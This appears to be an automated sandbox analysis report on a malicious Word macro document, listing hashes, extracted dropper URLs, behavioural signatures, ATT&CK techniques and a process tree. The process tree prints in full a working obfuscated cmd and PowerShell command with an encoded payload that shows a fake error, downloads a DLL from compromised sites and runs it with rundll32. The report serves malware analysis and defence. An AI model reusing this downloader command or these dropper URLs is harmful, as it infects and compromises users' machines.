3b34e75cce4b617fd876f0145c30b4ea5af865c2edb3b8cc89fdc268bb347b1a

General

Target

3b34e75cce4b617fd876f0145c30b4ea5af865c2edb3b8cc89fdc268bb347b1a.doc
Size

158KB
MD5

17023dfa3d2bdc4bb809127befcc1120
SHA1

49bf29931cd149ed1eecca34514f4723a2ba4c9b
SHA256

3b34e75cce4b617fd876f0145c30b4ea5af865c2edb3b8cc89fdc268bb347b1a
SHA512

51efc2584aa97534ba391d7eaed2019aab746d670866db00c9690759411a04bc5f3f7a7c75fa4ccfe05294ebd31aaaaa52fc18b9c8626bf491adc8821721138a

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://altrashift.com/wp-includes/I/

exe.dropper

https://ojodetigremezcal.com/wp/i62s/

exe.dropper

https://snowremoval-services.com/wp-content/P3Z/

exe.dropper

http://kitsunecomplements.com/too-much-phppq/n65U/

exe.dropper

https://imperioone.com/content/WOBq/

exe.dropper

http://www.autoeck-baden.at/wp-content/w0Vb/

exe.dropper

https://shop.animewho.com/content/Tj/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4076 4064 cmd.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

21 2292 powershell.exe
23 2292 powershell.exe
25 2292 powershell.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4016 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Jnrzdskoitta\quhrqbsonnf.sqg rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4076	4064	cmd.exe

flow	pid	process
21	2292	powershell.exe
23	2292	powershell.exe
25	2292	powershell.exe

pid	process
4016	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Jnrzdskoitta\quhrqbsonnf.sqg	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

504 WINWORD.EXE
504 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2292 powershell.exe
2292 powershell.exe
2292 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2292 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

504 WINWORD.EXE
504 WINWORD.EXE
504 WINWORD.EXE
504 WINWORD.EXE
504 WINWORD.EXE
504 WINWORD.EXE
504 WINWORD.EXE

pid	process
504	WINWORD.EXE
504	WINWORD.EXE

pid	process
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2292	powershell.exe

pid	process
504	WINWORD.EXE
504	WINWORD.EXE
504	WINWORD.EXE
504	WINWORD.EXE
504	WINWORD.EXE
504	WINWORD.EXE
504	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 4076 wrote to memory of 188	4076	cmd.exe	msg.exe
PID 4076 wrote to memory of 188	4076	cmd.exe	msg.exe
PID 4076 wrote to memory of 2292	4076	cmd.exe	powershell.exe
PID 4076 wrote to memory of 2292	4076	cmd.exe	powershell.exe
PID 2292 wrote to memory of 3344	2292	powershell.exe	rundll32.exe
PID 2292 wrote to memory of 3344	2292	powershell.exe	rundll32.exe
PID 3344 wrote to memory of 4016	3344	rundll32.exe	rundll32.exe
PID 3344 wrote to memory of 4016	3344	rundll32.exe	rundll32.exe
PID 3344 wrote to memory of 4016	3344	rundll32.exe	rundll32.exe
PID 4016 wrote to memory of 3928	4016	rundll32.exe	rundll32.exe
PID 4016 wrote to memory of 3928	4016	rundll32.exe	rundll32.exe
PID 4016 wrote to memory of 3928	4016	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3b34e75cce4b617fd876f0145c30b4ea5af865c2edb3b8cc89fdc268bb347b1a.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:504

C:\Windows\system32\cmd.exe
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABEAEUAIAAgAD0AIABbAFQAWQBQAGUAXQAoACIAewAwAH0AewAzAH0AewA0AH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAFMAJwAsACcAUgBlAEMAdABvAFIAeQAnACwAJwBtAC4AaQBPAC4ARABpACcALAAnAFkAJwAsACcAUwB0AEUAJwApADsAIAAgACQAcQAwADkAIAA9ACAAWwBUAFkAcABFAF0AKAAiAHsANwB9AHsANAB9AHsAMQB9AHsAMwB9AHsANQB9AHsANgB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAGkATgAnACwAJwBtAC4AbgBlACcALAAnAFQATQBBAE4AYQBnAEUAcgAnACwAJwBUACcALAAnAHMAdABFACcALAAnAC4AcwBFACcALAAnAFIAdgBJAEMARQBwAG8AJwAsACcAUwB5ACcAKQA7ACAAJABRAG8AbABzADUAdgB2AD0AJABOADMAXwBLACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABXADMANQBRADsAJABJADMAXwBSAD0AKAAnAFIAJwArACgAJwA2ACcAKwAnADQARAAnACkAKQA7ACAAKAAgAGcAZQBUAC0AdgBBAFIASQBhAGIAbABFACAAKAAiADgAIgArACIAZABlACIAKQAgAC0AdgBBAEwAVQBFAG8ATgBMAFkAKQA6ADoAIgBDAGAAUgBlAGEAYABUAGUARABJAHIAYABFAEMAYABUAE8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBWACcAKwAnAEwAZgAnACkAKwAoACcATABkADUAZAAnACsAJwBiACcAKwAnAGkAMwBWAEwAJwArACcAZgAnACkAKwAoACcAVwAnACsAJwBlADkAdwAnACsAJwBtAGcAJwApACsAJwA0ACcAKwAoACcAVgBMACcAKwAnAGYAJwApACkAIAAtAHIARQBQAGwAYQBjAEUAKAAnAFYAJwArACcATABmACcAKQAsAFsAYwBIAGEAUgBdADkAMgApACkAOwAkAFcAMQA2AFEAPQAoACcATAA3ACcAKwAnADYAVwAnACkAOwAgACAAKAAgACAASQBUAGUATQAgAFYAYQBSAEkAYQBCAGwARQA6AFEAMAA5ACAAIAApAC4AdgBhAEwAVQBlADoAOgAiAHMAYABlAGMAdQBSAGAASQBgAFQAeQBQAFIAbwBUAE8AYABjAG8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbAAnACsAJwBzADEAMgAnACkAKQA7ACQAUwA2ADcATgA9ACgAKAAnAFEANwAnACsAJwAzACcAKQArACcAVgAnACkAOwAkAFcAdwBpAHIAdgA1AGEAIAA9ACAAKAAnAFgANQAnACsAJwA1AEgAJwApADsAJABOADAAMwBZAD0AKAAnAEQAJwArACgAJwAxADEAJwArACcARAAnACkAKQA7ACQARwBjAHoAdgAyADEAZwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AEwAZAA1AGQAYgBpADMAewAwAH0AVwBlACcAKwAoACcAOQB3ACcAKwAnAG0AJwApACsAJwBnADQAewAwACcAKwAnAH0AJwApACAALQBmACAAIABbAEMASABBAFIAXQA5ADIAKQArACQAVwB3AGkAcgB2ADUAYQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEwAOAA0AE8APQAoACcARwAnACsAKAAnADgANgAnACsAJwBHACcAKQApADsAJABNAHoAMgA1AF8AMwBuAD0AKAAoACcAdwBdAHgAbQBbACcAKwAnAHYAcwA6AC8ALwAnACsAJwBhAGwAJwArACcAdAAnACsAJwByACcAKQArACgAJwBhAHMAJwArACcAaAAnACkAKwAoACcAaQBmACcAKwAnAHQALgAnACkAKwAoACcAYwAnACsAJwBvAG0ALwB3AHAALQAnACsAJwBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAAnACsAJwB1AGQAZQAnACkAKwAoACcAcwAnACsAJwAvAEkAJwApACsAKAAnAC8AQAB3AF0AJwArACcAeABtACcAKwAnAFsAdgBzADoAJwArACcALwAvAG8AJwArACcAagBvAGQAJwArACcAZQB0ACcAKwAnAGkAJwApACsAKAAnAGcAcgBlAG0AZQB6AGMAJwArACcAYQBsACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAvACcAKQArACgAJwBpACcAKwAnADYAMgBzAC8AJwApACsAKAAnAEAAdwAnACsAJwBdAHgAbQBbACcAKwAnAHYAcwA6ACcAKwAnAC8ALwBzACcAKQArACgAJwBuAG8AJwArACcAdwByAGUAJwApACsAKAAnAG0AbwAnACsAJwB2ACcAKQArACgAJwBhAGwALQAnACsAJwBzAGUAcgB2ACcAKwAnAGkAYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKwAnAGUAJwApACsAKAAnAG4AdAAvACcAKwAnAFAAMwBaAC8AQAAnACsAJwB3ACcAKwAnAF0AJwArACcAeAAnACsAJwBtAFsAdgA6AC8AJwApACsAKAAnAC8AJwArACcAawBpAHQAcwB1ACcAKwAnAG4AZQBjAG8AJwApACsAKAAnAG0AJwArACcAcABsACcAKQArACgAJwBlAG0AJwArACcAZQAnACsAJwBuACcAKwAnAHQAcwAuAGMAbwBtAC8AdABvACcAKQArACcAbwAnACsAKAAnAC0AJwArACcAbQB1ACcAKQArACgAJwBjAGgALQBwACcAKwAnAGgAcABwACcAKQArACgAJwBxAC8AJwArACcAbgA2ACcAKQArACcANQAnACsAKAAnAFUALwAnACsAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgBzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBpACcAKQArACgAJwBtACcAKwAnAHAAJwArACcAZQByAGkAbwBvAG4AZQAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvAGMAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQALwBXACcAKwAnAE8AQgAnACkAKwAnAHEAJwArACgAJwAvAEAAJwArACcAdwAnACkAKwAoACcAXQB4ACcAKwAnAG0AWwB2ACcAKwAnADoALwAvAHcAJwArACcAdwB3AC4AYQB1ACcAKwAnAHQAbwBlACcAKwAnAGMAawAtAGIAYQBkACcAKwAnAGUAbgAuAGEAdAAvAHcAcAAtACcAKQArACgAJwBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAnACkAKwAnAC8AdwAnACsAKAAnADAAJwArACcAVgBiACcAKQArACgAJwAvAEAAdwBdAHgAbQBbACcAKwAnAHYAcwAnACkAKwAoACcAOgAvACcAKwAnAC8AcwBoACcAKQArACcAbwBwACcAKwAoACcALgBhAG4AJwArACcAaQBtACcAKQArACcAZQAnACsAKAAnAHcAJwArACcAaABvAC4AYwBvACcAKwAnAG0ALwAnACsAJwBjAG8AJwApACsAKAAnAG4AdAAnACsAJwBlACcAKQArACgAJwBuAHQAJwArACcALwAnACkAKwAoACcAVABqACcAKwAnAC8AJwApACkALgAiAHIARQBwAGwAYABBAGAAYwBlACIAKAAoACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbACcAKwAnAHYAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQB3ACcAKwAnAGYAJwApACkALAAoACcAdwBlACcAKwAoACcAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAUABsAGAAaQB0ACIAKAAkAFcAOAA1AFIAIAArACAAJABRAG8AbABzADUAdgB2ACAAKwAgACQAQgA0ADYATgApADsAJABMADgAMwBUAD0AKAAnAFAAJwArACgAJwA1ADYAJwArACcAUAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB5ADQAMAB3AGoAZwAgAGkAbgAgACQATQB6ADIANQBfADMAbgApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3ACcAKwAnAC0ATwBiAGoAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAVAAuAFcARQBCAEMATABJAEUATgB0ACkALgAiAEQAYABPAHcATgBMAG8AYQBEAGAARgBgAGkATABlACIAKAAkAEYAeQA0ADAAdwBqAGcALAAgACQARwBjAHoAdgAyADEAZwApADsAJABSADUANQBRAD0AKAAnAFkANAAnACsAJwA4AFMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEcAYwB6AHYAMgAxAGcAKQAuACIAbABgAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADMANgAzADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAGMAegB2ADIAMQBnACwAKAAoACcAUwAnACsAJwBoAG8AdwBEACcAKQArACgAJwBpAGEAJwArACcAbABvACcAKQArACcAZwAnACsAJwBBACcAKQAuACIAVABPAFMAYABUAFIASQBgAE4ARwAiACgAKQA7ACQAWAAzADMAQgA9ACgAJwBLADYAJwArACcANQBGACcAKQA7AGIAcgBlAGEAawA7ACQATwA2ADUATAA9ACgAKAAnAE0ANwAnACsAJwAzACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMABfAEoAPQAoACcARgAnACsAKAAnADkAJwArACcAMgBRACcAKQApAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4076
- C:\Windows\system32\msg.exe
  msg Admin /v Word experienced an error trying to open the file.
  2⤵
  PID:188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -enc IAAgACQAOABEAEUAIAAgAD0AIABbAFQAWQBQAGUAXQAoACIAewAwAH0AewAzAH0AewA0AH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAFMAJwAsACcAUgBlAEMAdABvAFIAeQAnACwAJwBtAC4AaQBPAC4ARABpACcALAAnAFkAJwAsACcAUwB0AEUAJwApADsAIAAgACQAcQAwADkAIAA9ACAAWwBUAFkAcABFAF0AKAAiAHsANwB9AHsANAB9AHsAMQB9AHsAMwB9AHsANQB9AHsANgB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAGkATgAnACwAJwBtAC4AbgBlACcALAAnAFQATQBBAE4AYQBnAEUAcgAnACwAJwBUACcALAAnAHMAdABFACcALAAnAC4AcwBFACcALAAnAFIAdgBJAEMARQBwAG8AJwAsACcAUwB5ACcAKQA7ACAAJABRAG8AbABzADUAdgB2AD0AJABOADMAXwBLACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABXADMANQBRADsAJABJADMAXwBSAD0AKAAnAFIAJwArACgAJwA2ACcAKwAnADQARAAnACkAKQA7ACAAKAAgAGcAZQBUAC0AdgBBAFIASQBhAGIAbABFACAAKAAiADgAIgArACIAZABlACIAKQAgAC0AdgBBAEwAVQBFAG8ATgBMAFkAKQA6ADoAIgBDAGAAUgBlAGEAYABUAGUARABJAHIAYABFAEMAYABUAE8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBWACcAKwAnAEwAZgAnACkAKwAoACcATABkADUAZAAnACsAJwBiACcAKwAnAGkAMwBWAEwAJwArACcAZgAnACkAKwAoACcAVwAnACsAJwBlADkAdwAnACsAJwBtAGcAJwApACsAJwA0ACcAKwAoACcAVgBMACcAKwAnAGYAJwApACkAIAAtAHIARQBQAGwAYQBjAEUAKAAnAFYAJwArACcATABmACcAKQAsAFsAYwBIAGEAUgBdADkAMgApACkAOwAkAFcAMQA2AFEAPQAoACcATAA3ACcAKwAnADYAVwAnACkAOwAgACAAKAAgACAASQBUAGUATQAgAFYAYQBSAEkAYQBCAGwARQA6AFEAMAA5ACAAIAApAC4AdgBhAEwAVQBlADoAOgAiAHMAYABlAGMAdQBSAGAASQBgAFQAeQBQAFIAbwBUAE8AYABjAG8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbAAnACsAJwBzADEAMgAnACkAKQA7ACQAUwA2ADcATgA9ACgAKAAnAFEANwAnACsAJwAzACcAKQArACcAVgAnACkAOwAkAFcAdwBpAHIAdgA1AGEAIAA9ACAAKAAnAFgANQAnACsAJwA1AEgAJwApADsAJABOADAAMwBZAD0AKAAnAEQAJwArACgAJwAxADEAJwArACcARAAnACkAKQA7ACQARwBjAHoAdgAyADEAZwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AEwAZAA1AGQAYgBpADMAewAwAH0AVwBlACcAKwAoACcAOQB3ACcAKwAnAG0AJwApACsAJwBnADQAewAwACcAKwAnAH0AJwApACAALQBmACAAIABbAEMASABBAFIAXQA5ADIAKQArACQAVwB3AGkAcgB2ADUAYQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEwAOAA0AE8APQAoACcARwAnACsAKAAnADgANgAnACsAJwBHACcAKQApADsAJABNAHoAMgA1AF8AMwBuAD0AKAAoACcAdwBdAHgAbQBbACcAKwAnAHYAcwA6AC8ALwAnACsAJwBhAGwAJwArACcAdAAnACsAJwByACcAKQArACgAJwBhAHMAJwArACcAaAAnACkAKwAoACcAaQBmACcAKwAnAHQALgAnACkAKwAoACcAYwAnACsAJwBvAG0ALwB3AHAALQAnACsAJwBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAAnACsAJwB1AGQAZQAnACkAKwAoACcAcwAnACsAJwAvAEkAJwApACsAKAAnAC8AQAB3AF0AJwArACcAeABtACcAKwAnAFsAdgBzADoAJwArACcALwAvAG8AJwArACcAagBvAGQAJwArACcAZQB0ACcAKwAnAGkAJwApACsAKAAnAGcAcgBlAG0AZQB6AGMAJwArACcAYQBsACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAvACcAKQArACgAJwBpACcAKwAnADYAMgBzAC8AJwApACsAKAAnAEAAdwAnACsAJwBdAHgAbQBbACcAKwAnAHYAcwA6ACcAKwAnAC8ALwBzACcAKQArACgAJwBuAG8AJwArACcAdwByAGUAJwApACsAKAAnAG0AbwAnACsAJwB2ACcAKQArACgAJwBhAGwALQAnACsAJwBzAGUAcgB2ACcAKwAnAGkAYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKwAnAGUAJwApACsAKAAnAG4AdAAvACcAKwAnAFAAMwBaAC8AQAAnACsAJwB3ACcAKwAnAF0AJwArACcAeAAnACsAJwBtAFsAdgA6AC8AJwApACsAKAAnAC8AJwArACcAawBpAHQAcwB1ACcAKwAnAG4AZQBjAG8AJwApACsAKAAnAG0AJwArACcAcABsACcAKQArACgAJwBlAG0AJwArACcAZQAnACsAJwBuACcAKwAnAHQAcwAuAGMAbwBtAC8AdABvACcAKQArACcAbwAnACsAKAAnAC0AJwArACcAbQB1ACcAKQArACgAJwBjAGgALQBwACcAKwAnAGgAcABwACcAKQArACgAJwBxAC8AJwArACcAbgA2ACcAKQArACcANQAnACsAKAAnAFUALwAnACsAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgBzACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBpACcAKQArACgAJwBtACcAKwAnAHAAJwArACcAZQByAGkAbwBvAG4AZQAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvAGMAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQALwBXACcAKwAnAE8AQgAnACkAKwAnAHEAJwArACgAJwAvAEAAJwArACcAdwAnACkAKwAoACcAXQB4ACcAKwAnAG0AWwB2ACcAKwAnADoALwAvAHcAJwArACcAdwB3AC4AYQB1ACcAKwAnAHQAbwBlACcAKwAnAGMAawAtAGIAYQBkACcAKwAnAGUAbgAuAGEAdAAvAHcAcAAtACcAKQArACgAJwBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAnACkAKwAnAC8AdwAnACsAKAAnADAAJwArACcAVgBiACcAKQArACgAJwAvAEAAdwBdAHgAbQBbACcAKwAnAHYAcwAnACkAKwAoACcAOgAvACcAKwAnAC8AcwBoACcAKQArACcAbwBwACcAKwAoACcALgBhAG4AJwArACcAaQBtACcAKQArACcAZQAnACsAKAAnAHcAJwArACcAaABvAC4AYwBvACcAKwAnAG0ALwAnACsAJwBjAG8AJwApACsAKAAnAG4AdAAnACsAJwBlACcAKQArACgAJwBuAHQAJwArACcALwAnACkAKwAoACcAVABqACcAKwAnAC8AJwApACkALgAiAHIARQBwAGwAYABBAGAAYwBlACIAKAAoACgAJwB3AF0AJwArACcAeAAnACkAKwAoACcAbQBbACcAKwAnAHYAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQB3ACcAKwAnAGYAJwApACkALAAoACcAdwBlACcAKwAoACcAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAUABsAGAAaQB0ACIAKAAkAFcAOAA1AFIAIAArACAAJABRAG8AbABzADUAdgB2ACAAKwAgACQAQgA0ADYATgApADsAJABMADgAMwBUAD0AKAAnAFAAJwArACgAJwA1ADYAJwArACcAUAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB5ADQAMAB3AGoAZwAgAGkAbgAgACQATQB6ADIANQBfADMAbgApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3ACcAKwAnAC0ATwBiAGoAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAVAAuAFcARQBCAEMATABJAEUATgB0ACkALgAiAEQAYABPAHcATgBMAG8AYQBEAGAARgBgAGkATABlACIAKAAkAEYAeQA0ADAAdwBqAGcALAAgACQARwBjAHoAdgAyADEAZwApADsAJABSADUANQBRAD0AKAAnAFkANAAnACsAJwA4AFMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEcAYwB6AHYAMgAxAGcAKQAuACIAbABgAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADMANgAzADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABHAGMAegB2ADIAMQBnACwAKAAoACcAUwAnACsAJwBoAG8AdwBEACcAKQArACgAJwBpAGEAJwArACcAbABvACcAKQArACcAZwAnACsAJwBBACcAKQAuACIAVABPAFMAYABUAFIASQBgAE4ARwAiACgAKQA7ACQAWAAzADMAQgA9ACgAJwBLADYAJwArACcANQBGACcAKQA7AGIAcgBlAGEAawA7ACQATwA2ADUATAA9ACgAKAAnAE0ANwAnACsAJwAzACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMABfAEoAPQAoACcARgAnACsAKAAnADkAJwArACcAMgBRACcAKQApAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2292
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ld5dbi3\We9wmg4\X55H.dll,ShowDialogA
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3344
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Ld5dbi3\We9wmg4\X55H.dll,ShowDialogA
      4⤵
      Loads dropped DLL
      Drops file in System32 directory
      Suspicious use of WriteProcessMemory
      PID:4016
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jnrzdskoitta\quhrqbsonnf.sqg",ShowDialogA
        5⤵
        
        PID:3928

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Ld5dbi3\We9wmg4\X55H.dll

MD5
d5f389be3e84ba01cbc72339072cb924

SHA1
e169639c3290d67bf91dcd3642d6342238737cf0

SHA256
ada80cba68b726036af7dc48b9a0f887117e5ad95c5dc8f88f85717ddd17eea2

SHA512
799eb6aa29807f2806515e724bd57e13c1e4fb7d8b22d83fe5162f436a49a7cc585c983b7a8f68f27c3a45707d9cd676a0ee56718c1483c796664546f00ffe53

Download Submit
\Users\Admin\Ld5dbi3\We9wmg4\X55H.dll

MD5
d5f389be3e84ba01cbc72339072cb924

SHA1
e169639c3290d67bf91dcd3642d6342238737cf0

SHA256
ada80cba68b726036af7dc48b9a0f887117e5ad95c5dc8f88f85717ddd17eea2

SHA512
799eb6aa29807f2806515e724bd57e13c1e4fb7d8b22d83fe5162f436a49a7cc585c983b7a8f68f27c3a45707d9cd676a0ee56718c1483c796664546f00ffe53

Download Submit
memory/188-3-0x0000000000000000-mapping.dmp

Download
memory/504-2-0x00007FF800510000-0x00007FF800B47000-memory.dmp

Filesize
6.2MB

Download
memory/2292-4-0x0000000000000000-mapping.dmp

Download
memory/2292-5-0x00007FFFF7E80000-0x00007FFFF886C000-memory.dmp

Filesize
9.9MB

Download
memory/2292-6-0x00000245987B0000-0x00000245987B1000-memory.dmp

Filesize
4KB

Download
memory/2292-7-0x0000024598960000-0x0000024598961000-memory.dmp

Filesize
4KB

Download
memory/3344-8-0x0000000000000000-mapping.dmp

Download
memory/3928-12-0x0000000000000000-mapping.dmp

Download
memory/4016-10-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads